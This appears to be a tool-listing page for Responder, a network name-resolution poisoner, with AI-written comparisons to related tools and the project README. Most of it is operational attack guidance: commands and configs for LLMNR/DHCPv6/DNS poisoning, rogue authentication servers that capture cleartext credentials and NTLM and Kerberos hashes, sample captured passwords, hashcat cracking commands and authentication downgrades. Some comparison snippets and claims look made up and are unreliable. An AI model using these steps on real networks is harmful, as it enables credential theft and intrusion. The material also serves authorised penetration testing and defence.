Convert Figma logo to code with AI

lgandx logoResponder

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

6,253
852
6,253
29
View on GitHub

Top Related Projects

SpiderLabs's avatar

Responder

4,814

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

lgandx's avatar

PCredz

2,397

This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.

byt3bl33d3r's avatar

CrackMapExec

9,015

A swiss army knife for pentesting networks

Kevin-Robertson's avatar

Inveigh

2,886

.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers

dirkjanm's avatar

krbrelayx

1,508

Kerberos relaying and unconstrained delegation abuse toolkit

Quick Overview

Responder is an open-source network analysis and penetration testing tool designed to respond to specific NBT-NS, LLMNR, and MDNS requests. It can be used to identify and exploit vulnerabilities in network configurations, particularly in Windows environments. Responder is primarily used for security assessments and ethical hacking purposes.

Pros

  • Highly effective for identifying and exploiting network misconfigurations
  • Supports multiple protocols and attack vectors
  • Actively maintained and regularly updated
  • Includes a built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server

Cons

  • Can be potentially misused for malicious purposes
  • Requires careful handling to avoid unintended consequences on target networks
  • May trigger antivirus or intrusion detection systems
  • Requires a good understanding of network protocols and security concepts

Getting Started

  1. Clone the repository:

    git clone https://github.com/lgandx/Responder

  2. Navigate to the Responder directory:

    cd Responder

  3. Run Responder with sudo privileges:

    sudo python3 Responder.py -I eth0 -rdwv

    Replace eth0 with your network interface.

  4. Responder will start listening for and responding to specific requests on the network. Monitor the output for captured hashes or other relevant information.

Note: Always ensure you have proper authorization before using Responder on any network. Unauthorized use may be illegal and unethical.

Competitor Comparisons

SpiderLabs logo

Responder

4,814

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

Pros of Responder (SpiderLabs)

  • More frequent updates and active maintenance
  • Broader community support and contributions
  • Enhanced compatibility with modern systems and networks

Cons of Responder (SpiderLabs)

  • Potentially less stable due to frequent changes
  • May have a steeper learning curve for new users
  • Some features might be considered "bloat" by minimalists

Code Comparison

Responder (lgandx):

def start():
    global OURIP
    if options.Interface is None:
        OURIP = FindLocalIP()
    elif options.Interface == 'ALL':
        OURIP = '0.0.0.0'
    else:
        OURIP = FindLocalIP(options.Interface)

Responder (SpiderLabs):

def start():
    global Config
    
    if not Config.Interface:
        Config.Interface = FindLocalIP()
    elif Config.Interface == 'ALL':
        Config.Interface = '0.0.0.0'
    else:
        Config.Interface = FindLocalIP(Config.Interface)

The code comparison shows that SpiderLabs' version uses a more centralized configuration approach, potentially making it easier to manage settings across the application.

lgandx logo

PCredz

2,397

This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.

Pros of PCredz

  • Focused specifically on credential extraction from network traffic
  • Supports a wider range of protocols for credential extraction (e.g., SMTP, IMAP, POP3)
  • Lightweight and can be easily integrated into existing network monitoring setups

Cons of PCredz

  • Less comprehensive in terms of overall network attack simulation
  • Lacks the ability to perform active attacks or respond to network requests
  • More limited in terms of customization and extensibility

Code Comparison

PCredz (packet parsing):

def ParsePcapng(fname):
    cap = pyshark.FileCapture(fname)
    for pkt in cap:
        Parse_pcap(pkt)

Responder (HTTP server setup):

def Run_HTTP_Server(ip, port):
    try:
        server = ThreadingHTTPServer((ip, port), HTTP)
        server.serve_forever()
    except Exception:
        pass

PCredz focuses on passive network traffic analysis and credential extraction, while Responder is a more comprehensive tool for network attack simulation and active response. Responder includes features like rogue authentication servers and SMB relay attacks, which are not present in PCredz. However, PCredz excels in its specific task of credential extraction from a wide range of protocols, making it a valuable tool for network security assessments and monitoring.

byt3bl33d3r logo

CrackMapExec

9,015

A swiss army knife for pentesting networks

Pros of CrackMapExec

  • More comprehensive post-exploitation capabilities
  • Supports a wider range of protocols (SMB, WMI, MSSQL, etc.)
  • Modular architecture allows for easy extension and customization

Cons of CrackMapExec

  • Steeper learning curve due to more complex functionality
  • Potentially more detectable by security solutions due to its broader scope
  • Requires more setup and dependencies compared to Responder

Code Comparison

Responder (Python):

if Config.Config.HTTP_On_Off:
    from servers.HTTP import HTTP
    threads.append(threading.Thread(name='HTTP', target=HTTP, args=()))

CrackMapExec (Python):

def proto_args(std_parser, module_parser):
    rdp_parser = argparse.ArgumentParser(add_help=False, parents=[std_parser, module_parser])
    rdp_parser.add_argument("-H", "--hash", metavar="HASH", dest="hash", nargs='+', default=[], help="NTLM hash(es) or file(s) containing NTLM hashes")
    return rdp_parser

Both tools are written in Python, but CrackMapExec's code reflects its more complex architecture and broader functionality. Responder focuses on specific network protocols, while CrackMapExec provides a more extensive framework for post-exploitation activities.

Kevin-Robertson logo

Inveigh

2,886

.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers

Pros of Inveigh

  • Written in PowerShell, allowing for easier integration with Windows environments and PowerShell scripts
  • Includes additional features like DNS spoofing and LLMNR/NBNS spoofing
  • Offers more granular control over specific attack vectors and configurations

Cons of Inveigh

  • Limited cross-platform compatibility compared to Responder's Python-based approach
  • May require additional setup or permissions in some Windows environments
  • Less frequent updates and potentially smaller community support

Code Comparison

Inveigh (PowerShell):

$Inveigh = Start-Inveigh -NBNS Y -LLMNR Y -HTTP Y -HTTPS Y -SMB Y

Responder (Python):

from responder import Responder
responder = Responder()
responder.start()

Summary

Both Inveigh and Responder are powerful tools for network penetration testing and security assessments. Inveigh excels in Windows-centric environments with its PowerShell implementation and additional features, while Responder offers broader cross-platform compatibility and a larger community. The choice between the two often depends on the specific testing environment and requirements of the security professional.

dirkjanm logo

krbrelayx

1,508

Kerberos relaying and unconstrained delegation abuse toolkit

Pros of krbrelayx

  • Specialized focus on Kerberos-based attacks, offering more advanced techniques for targeting Active Directory environments
  • Includes tools for exploiting specific Kerberos vulnerabilities like unconstrained delegation and SPN manipulation
  • Provides a suite of interconnected tools that work together for comprehensive Kerberos exploitation

Cons of krbrelayx

  • Narrower scope compared to Responder's broader network protocol spoofing capabilities
  • Requires more in-depth knowledge of Kerberos and Active Directory for effective use
  • Less suitable for general-purpose network attacks and credential harvesting

Code Comparison

Responder (Python):

def start():
    try:
        server = ThreadingUDPServer(('', 137), UDPHandler)
        t = threading.Thread(name='NBT-NS', target=server.serve_forever)
        t.setDaemon(True)
        t.start()
    except Exception as e:
        print(color("[!] Error starting NBT-NS server: {}".format(e), 1))

krbrelayx (Python):

def startServers(options):
    servers = []
    for server in (SMBRelayServer, HTTPRelayServer, IMAPRelayServer, LDAPRelayServer):
        s = server(options)
        s.start()
        servers.append(s)
    return servers

Both projects use Python and implement server functionality, but krbrelayx focuses on relay servers for specific protocols, while Responder includes a broader range of network services.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

Responder

Python Version License

Responder is a LLMNR, NBT-NS, and MDNS poisoner with built-in rogue authentication servers for HTTP, SMB, MSSQL, FTP, LDAP, Kerberos, DNS, and more. It supports NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP, and various authentication methods across 15+ protocols.

Table of Contents

Overview

Responder captures credentials by responding to LLMNR, NBT-NS, and MDNS name resolution requests. When a client attempts to resolve a non-existent hostname, Responder answers, directing the client to the attacker's machine where multiple rogue authentication servers capture credentials. DHCP, DHCPv6 rogue servers are also included and can be enabled separately.

Captured Data:

  • NetNTLMv1/v2 hashes - Crackable with hashcat/john
  • Kerberos AS-REQ hashes - Offline cracking (hashcat -m 7500)
  • Cleartext credentials - HTTP Basic, FTP, SMTP, IMAP, LDAP, SQL, etc.
  • Challenge-response - CRAM-MD5, DIGEST-MD5

What's New

This version includes:

DHCPv6 & DNS Enhancements

  • ✅ DHCPv6 INFORMATION-REQUEST - Full Windows 10/11 compatibility
  • ✅ Domain Filtering - Target specific domains (DHCPv6 & DNS)
  • ✅ Router Advertisements - Optional IPv6 network poisoning

Email Server Upgrades

  • ✅ SMTP STARTTLS - Capture from modern email clients
  • ✅ IMAP STARTTLS - Port 143 with TLS upgrade
  • ✅ IMAPS - Native SSL on port 993
  • ✅ Enhanced POP3 - Better compatibility

Kerberos Improvements

  • ✅ Force AS-REQ - Force kerberos authentication.
  • ✅ Attempt NTLM Fallback - After grabbing kerberos auth, return KDC_ERR_ETYPE_NOSUPP

Protocol Enhancements

  • ✅ MSSQL - SQL Server authentication capture
  • ✅ LDAP/LDAPS - Directory service credentials
  • ✅ RDP - Remote Desktop authentication
  • ✅ WinRM - Windows Remote Management
  • ✅ DCERPC - Windows RPC authentication

Installation

Requirements

  • Python 2.7 or Python 3.x
  • Linux (Ubuntu, Kali, Debian recommended)
  • Root privileges

System Dependencies

sudo apt-get update
sudo apt-get install python3 python3-pip python3-netifaces

Install Responder

git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt

Verify Installation

sudo python3 Responder.py --help

Quick Start

Basic Poisoning

# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v

# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v

DHCPv6 Attack

# Edit Responder.conf first:
# [DHCPv6 Server]
# DHCPv6_Domain = corp.local

sudo python3 Responder.py -I eth0 --dhcpv6 -v

Force HTTP Basic Auth

sudo python3 Responder.py -I eth0 -b -v

Enable Proxy Auth + Rogue DHCP

# Enable Proxy-auth server with rogue DHCP server injecting WPAD server (highly effective)
sudo python3 Responder.py -I eth0 -Pvd

Network Poisoning

LLMNR/NBT-NS/MDNS Poisoning

Purpose: Respond to name resolution failures

How it works:

  1. Client broadcasts query for non-existent host
  2. Responder answers: "I'm that host"
  3. Client connects to attacker
  4. Credentials captured

Configuration:

[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On

Usage:

sudo python3 Responder.py -I eth0 -v

DHCPv6 Server

Purpose: Force clients to use attacker's DNS via IPv6

Features:

  • ✅ INFORMATION-REQUEST support (Windows 10/11)
  • ✅ SOLICIT/REQUEST support
  • ✅ Domain filtering (surgical targeting)
  • ✅ Router Advertisement (optional)

How it works:

  1. Windows sends DHCPv6 INFORMATION-REQUEST, SOLICIT, REQUEST
  2. Responder responds: DNS = attacker IPv6
  3. Windows prioritizes IPv6 DNS
  4. All DNS queries → attacker
  5. DNS poisoning → credential capture

Configuration:

[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local

; Send Router Advertisements
SendRA = Off

; IPv6 address to advertise
BindToIPv6 = fe80::1

Usage:

sudo python3 Responder.py -I eth0 --dhcpv6 -v

Expected Output:

[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: user@corp.local:Password123

Rogue Servers

Responder includes 17+ rogue authentication servers:

File & Network Services

SMB Server (Ports 445, 139)

Purpose: Capture NetNTLM hashes from file shares

Features:

  • ✅ SMBv1/SMBv2/SMBv3
  • ✅ NetNTLMv1/v2 hash capture
  • ✅ Extended Security NTLMSSP
  • ✅ Session signing disabled (allows relay)

Triggers:

# UNC paths
\\attacker-ip\share
\\non-existent-server\files

# NET USE commands
net use \\attacker-ip\share

# Windows Explorer address bar
\\attacker-ip\

Captured Format:

username::domain:challenge:response:blob

Cracking:

hashcat -m 5600 smb-ntlmv2.txt wordlist.txt

Configuration:

[Responder Core]
SMB = On

FTP Server (Port 21)

Purpose: Capture cleartext FTP credentials

Features:

  • ✅ Anonymous login honeypot
  • ✅ USER/PASS authentication
  • ✅ Cleartext credential capture

Triggers:

ftp attacker-ip
# Username: anything
# Password: anything

Captured Format:

[FTP] Cleartext: username:password

Configuration:

[Responder Core]
FTP = On

Database Servers

MSSQL Server (Port 1433)

Purpose: Capture Microsoft SQL Server authentication

Features:

  • ✅ SQL Server authentication
  • ✅ Windows authentication (NTLM)
  • ✅ Cleartext SQL credentials
  • ✅ NetNTLMv2 hash capture

Triggers:

-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows

-- Command line
sqlcmd -S attacker-ip -U sa -P password

-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;

Captured Formats:

[MSSQL] SQL Auth: sa:password123
[MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob

Configuration:

[Responder Core]
SQL = On

Notes:

  • Captures both SQL authentication and Windows authentication
  • Works with SSMS, sqlcmd, ADO.NET connections
  • Can capture domain credentials via Windows auth

Email Servers

SMTP Server (Port 25, 587)

Purpose: Capture email client authentication

Features:

  • ✅ STARTTLS support (modern clients)
  • ✅ AUTH PLAIN (cleartext)
  • ✅ AUTH LOGIN (cleartext)
  • ✅ AUTH CRAM-MD5
  • ✅ AUTH DIGEST-MD5
  • ✅ AUTH NTLM (NetNTLMv2)

STARTTLS Flow:

Client → EHLO
Server → 250-STARTTLS
Client → STARTTLS
Server → 220 Ready to start TLS
[TLS handshake using self-signed cert]
Client → AUTH PLAIN <credentials>
Server → Captured! ✅

Triggers:

Email client configuration:
- Server: attacker-ip
- Port: 25 or 587
- Security: STARTTLS or None
- Username: anything
- Password: anything

Captured Formats:

[SMTP] LOGIN: user@company.com:Password123
[SMTP] NetNTLMv2: user::DOMAIN:challenge:response:blob
[SMTP] CRAM-MD5: user:challenge:response

Configuration:

[Responder Core]
SMTP = On

Certificate Warnings: Self-signed cert warnings are normal. Clients reject first attempt, retry, and succeed. Credentials still captured.

IMAP Server (Port 143)

Purpose: Capture IMAP authentication with STARTTLS

Features:

  • ✅ STARTTLS support
  • ✅ LOGIN command (cleartext)
  • ✅ AUTHENTICATE PLAIN
  • ✅ AUTHENTICATE LOGIN
  • ✅ AUTHENTICATE NTLM

STARTTLS Flow:

Client → CAPABILITY
Server → * CAPABILITY IMAP4 AUTH=PLAIN AUTH=NTLM STARTTLS
Client → STARTTLS
Server → OK Begin TLS negotiation now
[TLS upgrade]
Client → LOGIN user password
Server → Captured! ✅

Configuration:

[Responder Core]
IMAP = On

IMAPS Server (Port 993)

Purpose: IMAP over SSL (native encryption)

Features:

  • ✅ Native SSL from connection start
  • ✅ All IMAP authentication methods
  • ✅ No STARTTLS needed (already encrypted)

How it differs from IMAP:

Port 143 (IMAP): Plain → STARTTLS → Encrypted
Port 993 (IMAPS): Encrypted from start

Configuration:

[Responder Core]
IMAPS = On

POP3 Server (Port 110)

Purpose: Capture POP3 email retrieval credentials

Features:

  • ✅ USER/PASS authentication
  • ✅ APOP (MD5 challenge)
  • ✅ Cleartext credential capture

Triggers:

Email client:
- Protocol: POP3
- Server: attacker-ip
- Port: 110

Captured Format:

[POP3] USER: username
[POP3] PASS: password

Configuration:

[Responder Core]
POP = On

Web Servers

HTTP Server (Port 80)

Purpose: Capture web authentication

Features:

  • ✅ NTLM authentication (NetNTLMv1/v2)
  • ✅ Basic authentication (cleartext)
  • ✅ Digest authentication (MD5)
  • ✅ WPAD injection

Triggers:

Browser: http://attacker-ip/
UNC: file://attacker-ip/share
WPAD: Automatic proxy detection

Force Basic Auth:

sudo python3 Responder.py -I eth0 -b

Captured Formats:

[HTTP] NTLM NTLMv2: user::DOMAIN:challenge:response:blob
[HTTP] Basic: user:password
[HTTP] Digest: user:realm:hash

Configuration:

[Responder Core]
HTTP = On

HTTPS Server (Port 443)

Purpose: HTTPS with authentication capture

Features:

  • ✅ SSL/TLS encryption
  • ✅ All HTTP authentication methods
  • ✅ Self-signed certificate
  • ✅ WPAD over HTTPS

Configuration:

[Responder Core]
HTTPS = On
SSLCert = certs/responder.crt
SSLKey = certs/responder.key

Directory & Authentication

Kerberos Server (Port 88)

Purpose: Capture AS-REP hashes for offline cracking

Features:

  • ✅ AES256-CTS-HMAC-SHA1-96 (etype 18)
  • ✅ AES128-CTS-HMAC-SHA1-96 (etype 17)
  • ✅ ARCFOUR-HMAC-MD5 (etype 23)

How it works:

  1. Client sends AS-REQ (TGT request)
  2. Responder: "Pre-authentication required"
  3. Client sends AS-REQ with encrypted timestamp
  4. Responder captures encrypted timestamp
  5. Crack offline with hashcat

Cracking:

hashcat -m 7500 kerberos-asreq.txt wordlist.txt

Configuration:

[Responder Core]
Kerberos = On

LDAP Server (Port 389)

Purpose: Capture LDAP directory authentication

Features:

  • ✅ Simple authentication (cleartext)
  • ✅ NTLM authentication
  • ✅ Active Directory queries

Triggers:

# LDAP query
ldapsearch -H ldap://attacker-ip -D "CN=user,DC=corp,DC=local" -w password

# Active Directory tools
dsquery user -d attacker-ip

Captured Formats:

[LDAP] Simple: CN=user,DC=corp,DC=local:password
[LDAP] NetNTLMv2: user::DOMAIN:challenge:response:blob

Configuration:

[Responder Core]
LDAP = On

LDAPS Server (Port 636)

Purpose: LDAP over SSL

Features:

  • ✅ SSL/TLS encryption
  • ✅ All LDAP authentication methods

Configuration:

[Responder Core]
LDAP = On

Remote Access

RDP Server (Port 3389)

Purpose: Capture Remote Desktop authentication

Features:

  • ✅ Network Level Authentication (NLA)
  • ✅ NetNTLMv2 hash capture
  • ✅ CredSSP authentication

Triggers:

Remote Desktop Client:
- Computer: attacker-ip
- Username: anything
- Password: anything

Captured Format:

[RDP] NetNTLMv2: user::DOMAIN:challenge:response:blob

Configuration:

[Responder Core]
RDP = On

Note: Captures NLA authentication before desktop session.

WinRM Server (Ports 5985, 5986)

Purpose: Capture Windows Remote Management credentials

Features:

  • ✅ HTTP (5985) and HTTPS (5986)
  • ✅ Basic authentication
  • ✅ NTLM authentication
  • ✅ Kerberos authentication

Triggers:

# PowerShell remoting
Enter-PSSession -ComputerName attacker-ip
Invoke-Command -ComputerName attacker-ip -ScriptBlock { whoami }

# WinRM command line
winrm invoke -remote:http://attacker-ip

Captured Formats:

[WinRM] Basic: DOMAIN\user:password
[WinRM] NetNTLMv2: user::DOMAIN:challenge:response:blob

Configuration:

[Responder Core]
WINRM = On

Infrastructure

DNS Server (Port 53 TCP/UDP)

Purpose: Rogue DNS with domain filtering

Features:

  • ✅ A/AAAA record poisoning
  • ✅ MX record poisoning (email redirection)
  • ✅ SOA records (appear authoritative)
  • ✅ SRV records (Kerberos, LDAP)
  • ✅ SVCB/HTTPS records (modern browsers)
  • ✅ EDNS0 support
  • ✅ Domain filtering

Configuration:

[DHCPv6 Server]
; DNS uses same domain filter as DHCPv6
DHCPv6_Domain = corp.local

How it works:

Query: mail.corp.local
Response: 192.168.1.100 (attacker)
Client connects to attacker's SMTP
Credentials captured!

Supported Record Types:

  • A (IPv4) - Redirect to attacker
  • AAAA (IPv6) - Redirect to attacker
  • MX (Mail) - Email server poisoning
  • SRV (Services) - Kerberos, LDAP, etc.
  • SOA (Authority) - Appear as authoritative
  • TXT (Text) - SPF records
  • SVCB/HTTPS (Service Binding) - Modern browsers

Domain Filtering Example:

DHCPv6_Domain = corp.local

mail.corp.local → POISONED ✅
dc01.corp.local → POISONED ✅
google.com → IGNORED (normal DNS)

Configuration:

[Responder Core]
DNS = On

DCERPC Server (Port 135)

Purpose: Capture Windows RPC authentication

Features:

  • ✅ NTLM authentication
  • ✅ Windows service enumeration
  • ✅ NetNTLMv2 capture

Triggers:

Windows services querying RPC endpoint mapper
WMI queries
Remote registry access

Captured Format:

[DCERPC] NetNTLMv2: user::DOMAIN:challenge:response:blob

Configuration:

[Responder Core]
DCERPC = On

Configuration

Main Configuration File

Edit Responder.conf:

[Responder Core]
; === Network Services ===
SQL = On        # MSSQL (port 1433)
SMB = On        # SMB (ports 445, 139)
RDP = On        # Remote Desktop (port 3389)
Kerberos = On   # Kerberos (port 88)
FTP = On        # FTP (port 21)
POP = On        # POP3 (port 110)
SMTP = On       # SMTP with STARTTLS (port 25/587)
IMAP = On       # IMAP with STARTTLS (port 143)
IMAPS = On      # IMAPS with SSL (port 993)
HTTP = On       # HTTP (port 80)
HTTPS = On      # HTTPS (port 443)
DNS = On        # DNS (port 53)
LDAP = On       # LDAP/LDAPS (ports 389/636)
DCERPC = On     # Windows RPC (port 135)
WINRM = On      # Windows Remote Management (ports 5985/5986)

; === Poisoners ===
LLMNR = On      # Link-Local Multicast Name Resolution
NBTNS = On      # NetBIOS Name Service
MDNS = On       # Multicast DNS
DHCP = Off      # DHCP (IPv4) - use with caution
DHCPv6 = On     # DHCPv6 (IPv6) - use with more caution

; === Settings ===
SessionLog = On
LogToFile = On
Verbose = Yes
Database = Responder.db

; === SSL Certificates ===
SSLCert = certs/responder.crt
SSLKey = certs/responder.key

[HTTP Server]
HtmlFilename = files/AccessDenied.html

[DHCPv6 Server]
; Target specific domain 
DHCPv6_Domain = corp.local

; Send Router Advertisements (use with caution)
SendRA = Off

; IPv6 address to advertise
BindToIPv6 = fe80::1

Command-Line Options

Basic Usage

sudo python3 Responder.py [options]

Required Arguments

OptionDescription
-I eth0, --interface=eth0Network interface to use (use 'ALL' for all interfaces)

Poisoning Options

OptionDescription
-A, --analyzeAnalyze mode - See NBT-NS, MDNS, LLMNR requests without responding
-w, --wpadStart WPAD rogue proxy server (default: Off)
-F, --ForceWpadAuthForce NTLM/Basic authentication on wpad.dat retrieval (old networks)
-P, --ProxyAuthForce NTLM/Basic authentication for proxy (highly effective)

DHCP/DHCPv6 Options

OptionDescription
-d, --DHCPEnable DHCP broadcast responses with WPAD injection (IPv4)
-D, --DHCP-DNSInject DNS server in DHCP response instead of WPAD
--dhcpv6Enable DHCPv6 poisoning (responds to SOLICIT messages)

IP poisoning Options

OptionDescription
-e 10.0.0.22, --externalip=10.0.0.22Poison requests with another IPv4 address
-6 ADDR, --externalip6=ADDRPoison requests with another IPv6 address
-i 10.0.0.21, --ip=10.0.0.21Local IP to use (OSX only)

Authentication Options

OptionDescription
-b, --basicReturn HTTP Basic authentication (default: NTLM)
--lmForce LM hashing downgrade (Windows XP/2003)
--disable-essForce Extended Security NTLMSSP downgrade

Advanced Options

OptionDescription
-u HOST:PORT, --upstream-proxy=HOST:PORTUpstream HTTP proxy for rogue WPAD
-t 1e, --ttl=1eChange Windows TTL for poisoned answers (hex: 30s=1e, or 'random')
-N NAME, --AnswerName=NAMECanonical name for LLMNR answers (useful for Kerberos relay)
-E, --ErrorCodeReturn STATUS_LOGON_FAILURE (enables WebDAV auth capture)

Output Options

OptionDescription
-v, --verboseIncrease verbosity (recommended)
-Q, --quietQuiet mode - Disable poisoner output

Information

OptionDescription
--versionShow program version and exit
-h, --helpShow help message and exit

Storage Locations

Responder.db                    # SQLite database
logs/
├── HTTP-NTLMv2-<IP>.txt       # HTTP NetNTLMv2 hashes
├── SMB-NTLMv2-<IP>.txt        # SMB NetNTLMv2 hashes
├── MSSQL-NTLMv2-<IP>.txt      # MSSQL NetNTLMv2 hashes
├── Kerberos-AES-<IP>.txt      # Kerberos AS-REP hashes
├── SMTP-Cleartext-<IP>.txt    # SMTP cleartext credentials
├── IMAP-NTLMv2-<IP>.txt       # IMAP NetNTLMv2 hashes
├── FTP-Cleartext-<IP>.txt     # FTP cleartext credentials
├── LDAP-Cleartext-<IP>.txt    # LDAP cleartext credentials
├── RDP-NTLMv2-<IP>.txt        # RDP NetNTLMv2 hashes
└── WinRM-NTLMv2-<IP>.txt      # WinRM NetNTLMv2 hashes

Database Query

sqlite3 Responder.db

# Show tables
.tables

# Show all captured hashes
SELECT * FROM hashes;

# Export to CSV
.mode csv
.output hashes.csv
SELECT * FROM hashes;
.quit

OpSec Considerations

Detection Indicators:

  • Unusual LLMNR/NBT-NS responses
  • Rogue DHCP/DHCPv6 server
  • Invalid Kerberos pre-auth requests
  • Self-signed SSL certificates
  • Multiple authentication failures
  • Suspicious DNS responses

Defensive Measures:

  • Disable MDNS/LLMNR/NBT-NS via GPO
  • Enable DHCP snooping on the switch
  • Enable IPv6 RA guard
  • Enable DHCPv6 guard
  • Monitor for rogue DHCPv6 servers

Troubleshooting

Common Issues

Permission Denied:

sudo python3 Responder.py -I eth0

Interface Not Found:

ip link show
sudo python3 Responder.py -I wlan0

Port Already in Use:

sudo netstat -tulpn | grep 445
sudo systemctl stop smbd nmbd

DHCPv6 Not Working:

# Enable IPv6
sudo sysctl -w net.ipv6.conf.all.disable_ipv6=0

# Verify
sysctl net.ipv6.conf.all.disable_ipv6

No Hashes Captured:

# Verify servers running
sudo python3 Responder.py -I eth0 -v

# Check firewall
sudo iptables -L

# Monitor traffic
sudo tcpdump -i eth0 port 445 or port 88 or port 389

Debug Mode

# Very verbose output
sudo python3 Responder.py -I eth0 -vv

# Tail logs
tail -f logs/Responder-Session.log

# Network monitoring
sudo tcpdump -i eth0 -w responder-capture.pcap

Credits

Author: Laurent Gaffié

Donation

You can contribute to this project by donating to the following USDT or Bitcoin address:

USDT: 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A

BTC: bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

Paypal:

https://paypal.me/PythonResponder

Acknowledgments

Late Responder development has been possible because of the donations received from individuals and companies.

We would like to thanks those major sponsors:

SecureWorks: https://www.secureworks.com/

Synacktiv: https://www.synacktiv.com/

Black Hills Information Security: http://www.blackhillsinfosec.com/

TrustedSec: https://www.trustedsec.com/

Red Siege Information Security: https://www.redsiege.com/

Open-Sec: http://www.open-sec.com/

And all, ALL the pentesters around the world who donated to this project.

Thank you.